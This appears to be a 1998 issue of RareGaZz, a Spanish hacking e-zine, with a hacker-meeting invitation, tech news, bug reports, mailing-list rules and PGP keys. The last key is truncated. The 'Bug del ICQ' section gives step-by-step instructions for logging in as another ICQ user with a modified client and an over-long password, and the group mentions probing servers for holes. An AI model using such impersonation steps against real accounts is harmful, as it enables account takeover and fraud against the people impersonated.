La presente es para solicitar autorizacion para difundir su fantastica
revista en mi web ------> members.xoom.com/rifoxxx
Esta de mas decir q es una de las mejores del MUNDO y que he aprendido
mucho con ella
[ Pues claro!!!! Todo el que quiera tener nuestro e-zine en su web que nos
mande un mail indicandonos la ruta exacta de donde esta cada numero y lo
publicaremos como mirror en nuestra seccion de magazines ]
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
UnderCon II
Octubre de 1998 Murcia/Espaa
-Invitacion-
Fecha:
------
Primer fin de semana de Octubre. Viernes 2, Sabado 3 y Domingo 4.
Lugar:
------
Murcia capital. Punto de contacto CyberCafe Java.
La forma de llegar es muy sencilla tanto en coche, autobus, tren e incluso
avion.
Condiciones:
------------
- Cada grupo invitado contara con una persona de contacto que se encargara
de enviarle la invitacion, solucionarle dudas, y guiarle por la ciudad.
- Para mantener un nivel aceptable de asistencia, solo se permitira la entrada
de personas invitadas y acompaantes. (Identificados mediante la tarjeta
que tendreis que imprimir y rellenar, y que os sera enviada junto a esta
correo)
- No tenemos previsto cobrar entrada, salvo si es necesario cubrir los pocos
costes que el evento pueda originar.
- Comida y alojamiento son de libre eleccion, la organizacion aportara un
local en el que se pueda dormir (Con sacos de acampada) y recomendara
restaurantes donde comer, aunque se podra libremente optar por otras
alternativas.
- No se tiene previsto disponer de sitio para colocar ordenadores, aunque
los equipos portatiles seran bienvenidos.
- Disponer de un telefono movil sera recomendable a la hora de mantener el
contacto.
Contenido:
----------
- Los dos temas centrales del congreso seran el phreaking y el hacking,
aunque tambien se trataran temas como programacion de virus, ingenieria
inversa, carding, etc...
- Se impartiran una serie de conferencias, tanto por oradores locales como
por cualquier invitado que se sienta capaz.
- Se organizaran los habituales debates y tertulias, donde conocer a la
gente. Este ao intentaremos dividir a la gente en grupos para evitar la
masificacion de oradores.
- Tal vez si el tiempo lo permite se organice algun concurso, trivial-hack,
lanzamiento de moviles, etc...
- El sabado noche se organizara un ruta turistica por los garitos de la
ciudad.
Conferencias:
-------------
-Introduccion a las redes X25 por Dark Raver
-Seguridad en comunicaciones inalambricas por CPNE
-DNS spoofing Fatuo & Dark Raver
-Chaping por TDD
-Contratacion de un numero 900s en Espaa por Fatuo & Warezzman
-Cualquier otra que los invitados esten dispuestos a dar.
Grupos Asistentes:
------------------
-RareGaZz :)
-CPNE
-KTD
-TDD
-Hispahack
-Com30
-NPT
-Vieja Guardia
-29A
-etc...
Consultas:
----------
Es muy recomendable confirmar la asistencia con antelacion. Asi que incluso
aunque no tengais dudas, seria muy importante que escribais un pequeo
mensaje a la siguiente direccion:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Es tambien muy importante que contacteis con vuestra persona de contacto
para solucionar todos los detalles de vuestra asistencia.
Esta invitacion puede ser distribuida entre todos aquellos posbiles
interesados en el tema, siempre que sean de vuestra confianza y pudean
aportar su experiencia al evento.
Recomendamos maxima discrecion a la hora de comentar este tema.
Mas detalles os seran dados en un mensaje de vuestra persona de contacto,
en el que tambien recibireis el gif de la tarjeta de identificacion que
necesitareis imprimir y rellenar, y que hara las veces de invitacion.
Saludos
[ Pues si alguno quiere ir que me envie un mail a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
para que le de la invitacion correspondiente. Yo fui el ao pasado y este
voy a repetir ... no os lo podeis perder!! ]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-_-=-_-=-_-=-_-=
| |
| NOTILOONZ |
| --------- |
| _ _ _ _ |
=- -=- -=- -=- -=
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Novedades en el caso Vesatec
----------------------------
El caso mas reciente y bochornoso contra la libertad de expresion en
Internet da un paso importante hacia adelante... la sede central de la
BaSurA (BSA), ha decidido cerrar la sucursal de Barcelona, prescindiendo
de su colaborador el Sr. X. Ribas, hasta ahora conocido como el Abogado
Anti-Pirateria... jejjejejej, como se le conocera ahora?
Las malas lenguas dicen que desde que se incorporo el nuevo director de
Microsoft Espaa (recordemos que la mayor parte de la BSA, pertenece a
esta empresa), las cosas han cambiado mucho, y supongo que al revisar
nuestro caso, informaron a cierta persona en Redmond, que no le haria
mucha gracia, coincidiendo con su visita a Lisboa (el mismo dia que yo
cumplo ao, el 9/9) y su posible visita a Espa a posterior, pues han
decidido limpiar un poco en casa.
Por cierto segun fuentes de toda solvencia, el caso Vesatec, aparte de
otro de similares caracteristicas ocurrido en Italia en fechas antes de lo
nuestro (y que por cierto se resolvio a favor de los acusados), es uno de
los mas importantes de Europa, y esta en la mira de buffettes abogaciles
muy prestigiosos.
Teneis toda la informacion del suceso en http://bsatec.org
Salu2
Angeloso
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ampliarian el caso judicial de microsoft
----------------------------------------
El Departamento de Justicia de los Estados Unidos y los 20 estados
norteamericanos que estan demandando a Microsoft planean aumentar la
presion sobre la empresa de Bill Gates al incluir alegatos sobre nuevas
presuntas practicas monopslicas y dainas por parte del gigante del
software. Las nuevas acusaciones podrian ser presentadas hoy mismo e
incluirian evidencia que demostraria que Microsoft presiono a Intel para
que no tuviera en cuenta el software de su competidor Netscape
Communications, que manipulo su sistema operativo Windows para que no
pueda trabajar con productos de otras firmas, y que intento dividirse el
mercado del software de audio y video con Apple Computer, de acuerdo a lo
publicado por el Seattle Times. Segun estipula la ley norteamericana, el
gobierno y los estados solo pueden incluir nueva evidencia en caso de que
la misma esta relacionada con los cargos antes presentados. El juez que
entiende en la causa, ahora debera determinar si la nueva evidencia puede
ser tenida en cuenta para el juicio que comenzara el proximo 23 de
septiembre.
http://www.news.com/News/Item/0,4,25858,00.html?st.ne.4.head
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nuevo sistema para acceder a los E-Mails sin encender el PC
-----------------------------------------------------------
Un novedoso servicio de notificacion de emails original de Israel que esta
desembarcando en los Estados Unidos propone una pratica manera de chequear
el correo electronico. MailPush, como es conocido el nuevo sistema,
permite a los usuarios con cuentas de email acceder a sus mensajes a
traves de faxes, telefonos, celulares o pagers sin la necesidad de estar
en permanente contacto con sus computadoras. El sistema, que tambien
notifica a quien envia el mensaje que sus emails llegaron a destino, es
ofrecido directamente a traves de Internet por una unidad de Cellcom, la
empresa de telefonia celular mas grande de Israel. MailPush tambien planea
distribuir el servicio a traves de las empresas proveedoras de Internet
(ISP), al mismo tiempo que no descartan implementarlo en forma directa a
traves de las compaias de telefono. Marc Schechtman, vicepresidente de
MailPush, manifesto que proyectan que "de aqui a un ao, el 5% de los
usuarios norteamericanos de Internet se suscriban al servicio", y que
planean llevarlo a otros 20 paises en un futuro cercano.
http://www.news.com/News/Item/0,4,25856,00.html?st.ne.1.head
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft recharo las acusaciones de Sun con respecto a Java
------------------------------------------------------------
A traves de un documento presentado ante la corte que interviene en el
caso el viernes pasado, Microsoft rechazo energicamente las intimacion
preliminar presentada por Sun Microsystems en su contra alegando que una
accion de ese tipo "causaria no solo un gran dao a Microsoft sino tambien
a sus distribuidores, revendedores, desarrolladores de software e incluso
a los propios usuarios". En el mes de mayo, Sun presento una intimacion
preliminar argumentando que el Windows 98 incluye una version de Java que
es incompatible con la desarrollada por ellos, por lo que solicita que se
obligue a Microsoft a incluir la version de Sun en el flamante sistema
operativo y que se le impida a la compaia de Bill Gates distribuir el
Visual 6.0 hasta tanto no sea totalmente compatible con la version
standard del Java de Sun. En su descargo realizado el viernes, Microsoft
manifesto que no solo la empresa cumplio con la licencia sobre Java que
mantiene con Sun, sino que todos sus productos son compatibles con el
sistema en cuestion.
http://www.techweb.com/wire/story/TWB19980828S0001
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Una falla en Hotmail expuso los password de los usuarios
--------------------------------------------------------
El proveedor de mail gratuito de Microsoft admitio que esta intentando
reparar el problema originado en el servicio de correo de Hotmail, el cual
permitio que programadores malintencionados de JavaScript pudieran alterar
y vulnerar los passwords de los usuarios. El problema se detecto cuando la
empresa Specialty Installations publico una demostracion del mismo en su
site "Porque Podemos", el cual esta dedicado a los trabajos e
investigaciones no rentadas de los programadores de paginas web de la
compaia canadiense. Apodado "Hot" Mail, la muestra consta de un mail que
contiene el denominado Caballo de Troya, un sistema que altera la
interface de los usuarios con Hotmail. Una vez modificada la interface,
cualquier comando que se ejecuta produce un mensaje falso por "expiracion
de tiempo", y pide que se reingrese el nombre y password. Al cumplir con
la requisitoria, el usuario retorna al site standard de Hotmail, pero el
nombre y la clave personal en ese momento llegan a las manos de los
delincuentes o, en este caso de demostracion, a Specialty Installations.
Sean Fee, ejecutivo de Hotmail, manifesto que estan trabajando
intensamente ya que "la proteccion de los mails y las cuentas de los
clientes son de vital importancia para la compaia".
http://www.news.com/News/Item/0,4,25620,00.html?st.en.fd.gif.f
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bug del ICQ
-----------
Un tipo Zachary Allison, ha logrado traspasarla seguridad del ICQ y
hacerse pasar por cualquier usuario. Esta persona ha echo un clon del
icq pero para linux, el zICQ, para linux, tomando las fuentes del mICQ
y modificandolas, pero este no tiene la limitacion de pass del de
Mirabilis, ya que este permite pass de mas de 8 caracteres, al contrario
que el oficial que solo permite 8, y aqui esta el fallo que permite a
un usuario suplantar a otro previo conocimiento de su UIN, si mandas un
pass de mas de 8 caracteres el buffer de los servidores falla y te da
acceso como el UIn que le digas.
Primero se debe bajar el zICQ en: http://hookah.ml.org/zicq
Usa tu programa ICQ para ver si el usuario legitimo esta conectado, si
asi es espera que se desconete.
Conecta con el zICQ, da el UIN que quiereas y el pass "123456789"
El autor dice que esto no es spoofing, que simplemente estas conectado
como el usuario seleccionado y que puedes recibir y mandar mensajes como
si fueras el.
Funcionara siempre y cuando otro UIN no se haya logueado como el UIN por
el que te vas a hacer pasar..
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bug del E-Mail del Netscape y del Outlook
-----------------------------------------
Dos investigadores de la Universidad finlandesa de Oulu, Ari Takanen y
Marko Laakso, han descubierto un fallo de programacion en los programas
gestores de correo electronico de Netscape y Outlook de Microsoft, que
permitirman a intrusos informaticos con malas intenciones destruir o robar
documentos e insertar diferentes virus en nuestro ordenador. Tanto
Netscape como Microsoft han confirmado el hecho y han empezado a elaborar
contrareloj "parches" o programas que corrijan el defecto.
El defecto o "bug" se produce sin necesidad de abrir el mensaje, lo cual
ha disparado la alarma en la comunidad de Internet, pues hace revivir un
viejo fantasma que asolo la red en los primeros aos, cuando se penso que
la recepcion de un simple mensaje de correo electronico podria servir para
que alguien entrara en nuestro ordenador. Algunos desaprensivos se
encargaron a lo largo de los ultimos aos de mantener vivo el temor,
lanzando falsas ideas del tipo de "si usted abre un mensaje que lleve por
titulo "Win a holiday" o "Good times" infectara automaticamente su
maquina".
La noticia hoy es que existe la posibilidad de que simplemente recibiendo
un correo con un archivo adjunto, uno puede perder el control del propio
ordenador. Cuando el fichero adjunto lleva un nombre extremadamente largo,
con una extension superior a la que admite el sistema, el programa lector
de correo se queda "colgado". Pero antes de ello, al parecer, se ejecuta
el fichero en cuestion, que puede consistir en un virus o, por poner otro
ejemplo, en un programa para copiar el contenido del disco duro y enviarlo
por la red. Uno de los mayores expertos en seguridad en Espaa, Jose
Manuel Gomez, coordinador del sitio web Kriptspolis,http://kriptopolis.com
en el que se da una amplia informacion del tema, ha asegurado en su
boletin que "los usuarios estan ahora desprotegidos y, dada la
implantacion de los programas de correo, tenemos al diablo sentado en la
mesa".
Sin embargo, a pesar de la convulsion, el modo concreto de explotar este
"bug" aun no ha sido difundido. Tampoco han trascendido noticias de
ataques. Netscape ha se alado que en los proximos dias difundira una
version que evite el problema, mientras Microsoft ha recomendado que no se
lean los mensajes con ficheros adjuntos de comunicantes desconocidos.
Netscape ha pedido que "bajo ninguna circunstancia se active el menu de
Archivo cuando el mensaje esta seleccionado". Ambos fabricantes de
software sugieren visitas periodicas a sus paginas dedicadas a seguridad,
pues tan pronto tengan el "antidoto" lo difundiran.
La fuerte competencia entre los navegadores ha llevado a ambas firmas
rivales a comercializar software con errores tan graves como estos, segun
coinciden diversos programadores consultados por nuestro diario. Como
fuente de informacion adicional, se recomienda News.com, asi como el foro
mas prestigioso de la red en cuestiones de "bugs" y errores de
programacion: http://www.ntbuqtraq.com,dsd.
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bug del Windows 98
------------------
Aparentemente el Windows 98 tiene un bugs que funciona de la siguiente
manera. El mal llamado sistema operativo (para mi software de sistema)
parece que se resetea solo, a determinada hora de determinados dias.
Parece que entre las 23:59 Hs. y las 24:00 Hs. (0:00 Hs.) del dias 31 de
diciembre de cada ao, dicho software se reinicia, solo sin ningun motivo
aparente y sin previo aviso, como si se hubira pulsado la tecla Reset de
la CPU.
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
La RareDudeZz esta cerca de los 500 usuarios
--------------------------------------------
La lista de correo de RareGaZz (mas conocida por RareDudeZz) comenzo a
funcionar con la unica intencion de avisar a nuestros lectores de las
apariciones de nuevos numeros en nuestro e-zine, pero se ha convertido,
gracias a todos, en uno de los mayores foros hispanos sobre temas
underground.
Hoy dia has cerca de 500 usuarios suscritos y se recibe una media de 20
o 30 mails diarios.
El tema principal de la lista es el Hacking pero tambien se tratan otros
temas y se ayuda a la gente mas iniciada, que parece que estan algo
perdidos.
Una vez mas quiero recordar las normas de la lista, las cuales podeis
encontrar en la pagina principal de RareGaZz:
- Formas de suscribirse:
1- Rellenando el formulario de nuestra Web
2- Enviando un e- mail a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
poniendo en el
subject: 'suscribe direc@de.correo' donde direc@de.correo
es vuestra direccion de e-mail ... no me seais tan burros
de poner 'direc@de.correo' ... que ya han habido varios.
3- Acceder a la pagina http://www.coollist.com y rellenar,
abajo del todo, vuestros datos de e-mail y la lista de
correo a la que os quereis suscribir; en este caso, la
'raredudez' (sin comillas).
- Formas de desuscribirse:
1- Acceder a la pagina http://www.remove.coollist.com y
rellenar vuestros datos de e-mail y la lista de correo
a la que os quereis desuscribir; en este caso, la
'raredudez' (sin comillas).
- Normas:
* Las teneis todas en la pagina principal de nuestra Web.
Leerlas antes de suscribiros porque luego hay mucha gente
que rellena el formulario y pregunta ... que hago aqui?
que es esto? porque me mandais tantos mails? Joder!!! no
sabeis leer?. Pues eso, que leais bien las normas antes
de suscribiros.
* No preguntes tonterias. No quiero decir que la dudas de la
gente iniciada sean tonterias. Al contrario, para eso
estamos!! pero las preguntas tipo: 'quiero entrar en mi
colegio para cambiarme las notas, explicarme en breve como
lo hago ... '. $%@ merecen ser dados de baja
inmediatamente.
* Puedes preguntar cosas sobre h/p/v/c, incluso dudas sobre
configuracion de Linux, pero ya esta. Tambien puedes
comentar noticias o nuevos bugs.
* Queda totalmente prohibido enviar attach en los mails (para
eso disponemos de un FTP anonimo).
- Ventajas:
* Si estas iniciandote todo son ventajas. Pero mejor primero
lee y cuando te enteres mas ya escribiras. No digas cosas
de las que luego te vayas a arrepentir :)
* Te enteraras de cuando salen nuevos numeros de nuestro
e-zine, asi como de los e-zines de nuestros compaeros de
SET y de JJFhackers, que estan haciendo tambien un buen
trabajo.
* Conoceras mas hackers, posiblemente de tu ciudad.
* Quedadas 'secretas' en el IRC. Solo para RareDudeZz.
* De vez en cuando hacemos estudios sobre la seguridad de
algun server. Para ver los posibles agujeros que pueda
tener.
* Disponemos de un FTP anonimo donde intercambiar programas
interesantes (no comerciales - no WareZz).
* Aunque sean muchos mails, son cortos y sin attach, por lo
que en 5 minutos los tienes todos en tu ordenador.
- Inconvenientes:
* La lista no esta moderada. Puedes recibir mails que no te
interesen (y que tendras que soportar sin insultar y sin)
meterte con nadie ... sino, seras borrado un mes de la
lista. Esto lo digo porque ya hemos tenido algun ligero
problemilla de gente muy 'guay' que piensa que algunas
preguntas son muy 'lamer' para ellos. Por desgracia hay
mucha gente asi. Te lloran para que les ensees cosas y
luego, cuando han aprendido 'algo', vacilan con los mas
newbies, en vez de ensearles. Y sino, leer el texto final
de Set 16 (extraido de un log del IRC) y ver como se creen
algunos que son 'guays' y resulta que nada mas que saben
'hablar' y banear a la gente. Seores, ser elite no
consiste en conseguir 'op' en un canal de hacking de IRC.
* 20 o 30 mails diarios.
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Undercon en Monterrey????
-------------------------
Hablando sobre la RareDudeZz, se ha estado discutiendo la posibilidad
de hacer un Undercon en Monterrey, Mexico, se ve que hay mucho
entusiasmo y ganas de lograr hacerlo.
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
X-Ploit TEAM ataca de nuevo
---------------------------
El grupo mexicano de Crackers, clasificados asi por Rootshell, hizo de
nuevo de las suyas en otro de los sites del gobierno mexicano, en esta
ocasion la victima fue www.sanpedro.gob.mx, que es un municipio del
estado de Nuevo Leon.
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
RaZa MeXiCaNa TEAM
------------------
Los seores(as) que se reunen en un canal denominado #RaZa_MeXicaNa, de
los servidores de Red Latina del IRC han sacado el numero 1 y 2 de su
boletin de seguridad, este boletin(muy bueno por cierto) lo puedes
encontrar en:
http://www.BigFoot.com/~RaZa-Mexicana
[ L l a v e s P G P ]
<<::RareGaZz::>> //
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use
mQGiBDV6jbIRBADl1IELaiXIUyKxED1if1YcTV6+d/flNE97cXC+nhFbfPKQ3oaj
ybIALWB3X9LhfbSc3uD5RTrHQcUATtYXRboMCUZe+OcI7dlndCsEyR1Jx9J49Qys
JbbjrPft9eWlA8SqEtSGaV8003phw09cWxhDu0LV/ijSngPpngjo+xsNJQCg/2qo
Ukocb3rX9hNNIjVb2a8SsjcD/2L6hM75g4KGY4qk2FlDWuoHivphn+ARO0fQCkmT
28UMf3dqktGXO5mn63mky/wjrTIjZd2w0jbeXIsyGFeD+1Bk3OGjJmds7j3pH8mP
jCvmoozX4MbHo5SbXi7MF4i/PNkcudlrXXZH/HAa6hBGqo7RHChFnZhxjfpvzX4Z
4BGCA/0ZTQyjqglnSPTyMPooMsi3QZZYZUIeKAcfYB1vuaf31X3CvKYlDLYF0qj4
5n15nIhyDHh3GwwlJJrdmOwmH/Fzn90mGn9xWpxD3Ou+qmvFLpn4RvupkupZkVJg
GJAfgDn+YnaVTeKqa+HME5RMzeKvIDHJVeXPf/JPe/RQg2kc6bQdUmFyZUdhWnog
PHJhcmVnYXp6QGluYW1lLmNvbT6JAEsEEBECAAsFAjV6jbIECwMBAgAKCRDzs12Y
6YPcYhezAKDpOa+ZYL9OzHv4DsryHl+yhwyXTwCeMQoUP8IDKHYycKV3aw9YCodC
Kze5BA0ENXqNsxAQAPkYoH5aBmF6Q5CV3AVsh4bsYezNRR8O2OCjecbJ3HoLrOQ/
40aUtjBKU9d8AhZIgLUV5SmZqZ8HdNP/46HFliBOmGW42A3uEF2rthccUdhQyiJX
Qym+lehWKzh4XAvb+ExN1eOqRsz7zhfoKp0UYeOEqU/Rg4Soebbvj6dDRgjGzB13
VyQ4SuLE8OiOE2eXTpITYfbb6yUOF/32mPfIfHmwch04dfv2wXPEgxEmK0Ngw+Po
1gr9oSgmC66prrNlD6IAUwGgfNaroxIe+g8qzh90hE/K8xfzpEDp19J3tkItAjbB
JstoXp18mAkKjX4t7eRdefXUkk+bGI78KqdLfDL2Qle3CH8IF3KiutapQvMF6PlT
ETlPtvFuuUs4INoBp1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZ
X9x2Uk89PY3bzpnhV5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56N
oKVyOtQa8L9GAFgr5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kj
wEPwpVsYjY67VYy4XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obE
AxnIByl6ypUM2Zafq9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XrPdYXAAIC
EACSSTN7roDGRmGohAOsqJpI60PKdgjCKGWrVYynv10Olg7V5Pycq3GV1+ZJydhn
UKs/x8MxghHj/VwZ5FftDYiK/za0Tnq1E63HEj43BLbvrGwnsov7wNiknzvjnEHp
UCc84uYhFqKaPfWafDLWKI4GsTI0x7RgQ0Vpn6Kxu/necFnT/AmEUvFQPkkBl8xI
5znTLn9wwb2FlOq2HBRW4F+bQaQaKpL5fWGFWw1ZPmven2RvA5XyeDuUBsbj/OkL
RQu9VlXb3mmD/rl0rzHK5tqPOmCp3IFTp/JY9TNbA1wEMC+WHsk1P2sE3fOYwP/0
w8xz2WpN83N12XB/rgrMaKUOrqn8sq7khYIasZITKZ23QAUAHu3mspVBjYvTKFqF
ih2xtEZi7rFeROxSM3gSobWbbL7eXYT1fXZkKYP5w3POD50vw2an9qItdCXjv9wz
7xD6ent7YpOiloPnal+3GMEHSsAPEwsfzz1l3Eirs6v5hMJQwiWJWRYwQe2rO/4Z
gCNl+2FFUTonOOIIetMxENwSNpBH4PGboLZj/sj3IyNJGa0C7fu+1qHVFF0pxSIR
KavkOPFl8BW4TnJCUCMa13QfxATvOqOiC9Y4ZVaUr9wD2+Czgd+xByFI7gwFQWgD
ZYr57ytKKcsFc8wp9ru+K2iv0CMkQs7QyvxbRN4qjZz4NIkAPwMFGDV6jbPzs12Y
6YPcYhECP48AoOk2UN0H/aa/dMjCjPZMPLs0Dt38AJ9ryQhkTcLGOLQOWZiGR2Fp
4XwaDg==
=crAP
-----END PGP PUBLIC KEY BLOCK-----
<<::Azumlord::>> //
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use
mQENAzPjTJ8AAAEIAPK1KI9F97qe09G16Rstzd1tlELbGmgRy8UPyzUkvMOTXIS9
onTp5gM3VEg8vJjCT9QrHsz6g0qRzttCO/+ixiHakVK3pzRO8EudwCVVEDECwAmM
aTDdspOZEn/mwoIO/UsAHAxQAuXNXL4JqscJ/ZNAlySchJgVk5KngyqMXlqpmwNW
CO7Gh4Ese2saJ++xvXWQHb+iBLHd/xo3cvNeJg5dFT2W/AjXa4WS/pXFmr5v8tut
yQIxJ4gw1XnEkoKlPIRQXLmHqs0Ct9069FbomKcfxb7mKbIIcAOhBKzhRtCQGiwJ
1yZOz61feAmCZTGT+wIcq0UGSeaQRzAu7Fxr5k0ABRG0IEF6dW0gTG9yZCA8QXp1
bUxvcmRAaG90bWFpbC5jb20+iQEVAwUQM+NMoEcwLuxca+ZNAQHi8ggAoRY+l28w
xlFbSB+Fb32pvBrHjuTSTtsfJqtKMbwx9Ot++3TWW9G+WgeHtdlSnMXMlfe5+Ft2
MxQwXfqMR4OzgyBVnkoaPH0Z2PBz6Cij44sLCrEQ+nZnpPAMTe60NCRphKwbXMGK
h8TNlIxxxPxtZSzO40dO4Rw5EkJcUQyykHmyHtzz/Ld7YfGYQmMEn40r2oX1k0/4
c8iJ1zrnzG6aiLKsvbm33SUx4wr9Q/0eBXALpijgzEs9PSau/ByCWEOwPJVpK2tQ
MaBF4rfm53UJxOCUBU8zYbG1rNUTY6UpYvvffnyaPzPoIZd2reYxY5i44WJCEXMF
+aRDrCB+VURqtg==
=r674
-----END PGP PUBLIC KEY BLOCK-----
Cytorax //
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use
mQCNAzSFCWgAAAEEAMfbmLIFrwArZmk6mM9B1kDJb9TFWpBpF5GoWfZyZvqlOMV0
e/0ngWnisCQcbZy42knU3brXuwyOzyRZ4DrfPfnGmShx8FpEM/uCszQYF00JQsWD
95Emq1I5d0V+BUAtoaMeCZn6dU5sgteImgIAxDR5lx4r8yWq70jBPfwtI2dNAAUR
tB1DeXRvcmF4IDxDeXRvcmF4QGJpZ2Zvb3QuY29tPokAlQMFEDSFCWlIwT38LSNn
TQEBSeoEAMBzsNwdq1A4EXT9ZkEwgSCeLofv7rUoJn4w75FvEBCfofijDWUwCkQJ
FHGwcnAW4xg0wJzs4MByjSEvLnxCB++BmwGM6l8/NiyrolDk7rnOaHI1tU0wcCmz
oNhHQdrfL0zmRNlR5QvXqlPnRxCB/GgLXLyrJGtvoDtv6U3SaL4s
=Xw7I
-----END PGP PUBLIC KEY BLOCK-----
Guybrush //
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use
mQGiBDYHhEARBADSZv+eHfn9HidCUXDbXO3T+AXXXZeJJ25CP+6QCMJAnziEbPNP
NXBGt1rjnTKsidUSUSrOQCgZ95hP3HC8wXHy55Sq69QPmuJeyDhzZSPJhC6+6pWC
CxiN+Qcq9ae+UIA8/NQj7r5os5eMmHSlK4DvEi87eN2vn5TmE7RKEtS/SQCg/8Dc
a0gBuCZYxwkCvuc/+iq+N48EAKQ3N4H6PRpbcDn+KcJHStgEp5EyhN7hNv2k10lr
2APTc84Aax6cLV828LpkT4SMNr4jtg303p0WdcVeOJIxy08THow8Rvy1u+IYKgar
hrHBeYRFEN88Pa56fpKykeUQmyvMn/wF5vcKnF2vH+paNzoBQJuCaj8QIxxe1ES5
GOUfA/99l/KBtuDb3kUIQ6v2i/cz4R+fHVKCRm1XeEf1vgyQohLrOQ0VkIfV7lJe
9xdlKa57z157eQ+btG785S6FjQsVDDVvdEzv9y9ylCNAgGAik6j/LIsi+JIMSQzW
4R3O//SPQMCFwns91UdtJvQ4810sj3fHnbFE+n4Gb1JRj6N49LQhR3V5QnJ1c2gg
PGd1eWJydXNoQGN5YmVyZHVkZS5jb20+iQBLBBARAgALBQI2B4RABAsDAgEACgkQ
+2GK9zeXB8G/cwCgsaMg6WojhHO2GPTCroxccNtchX8AoLY92TtMVmWqyXkIMicd
d/Q5U3mPuQQNBDYHhEIQEAD5GKB+WgZhekOQldwFbIeG7GHszUUfDtjgo3nGydx6
C6zkP+NGlLYwSlPXfAIWSIC1FeUpmamfB3TT/+OhxZYgTphluNgN7hBdq7YXHFHY
UMoiV0MpvpXoVis4eFwL2/hMTdXjqkbM+84X6CqdFGHjhKlP0YOEqHm274+nQ0YI
xswdd1ckOErixPDojhNnl06SE2H22+slDhf99pj3yHx5sHIdOHX79sFzxIMRJitD
YMPj6NYK/aEoJguuqa6zZQ+iAFMBoHzWq6MSHvoPKs4fdIRPyvMX86RA6dfSd7ZC
LQI2wSbLaF6dfJgJCo1+Le3kXXn11JJPmxiO/CqnS3wy9kJXtwh/CBdyorrWqULz
Bej5UxE5T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHT
UPj1WV/cdlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq
01uejaClcjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O
9vPJI8BD8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcK
ctaGxAMZyAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6z3W
FwACAhAAoJeMbD7tViCl2imkbWMIO75M2b+nqeWnXHrzTE/CCxu/IGb7M1MOGKhV
uHn8XNQLryM9krXfEXymUbR7YIAe04ZTIu+J+7OwTU6b9UhazJFxP8p3Z4PuTaG+
oIiPOJOMf58M5IbER24sCQyEFA7D/3/PdFbeDRTPTdMjV45SF6AtJ9JcuRUlbRSA
aC4nidZQERl7WFbsJwzj3Rwy1CZcyrJhYODYfNZRa9AtFQFBGYmg/ZglkXHVvAnL
UDjUpOE9kPMYjQTgYrSj13zSpVm3xv9kiYYJVSGY2Vel28m72BjU0Ux70SSLszsq
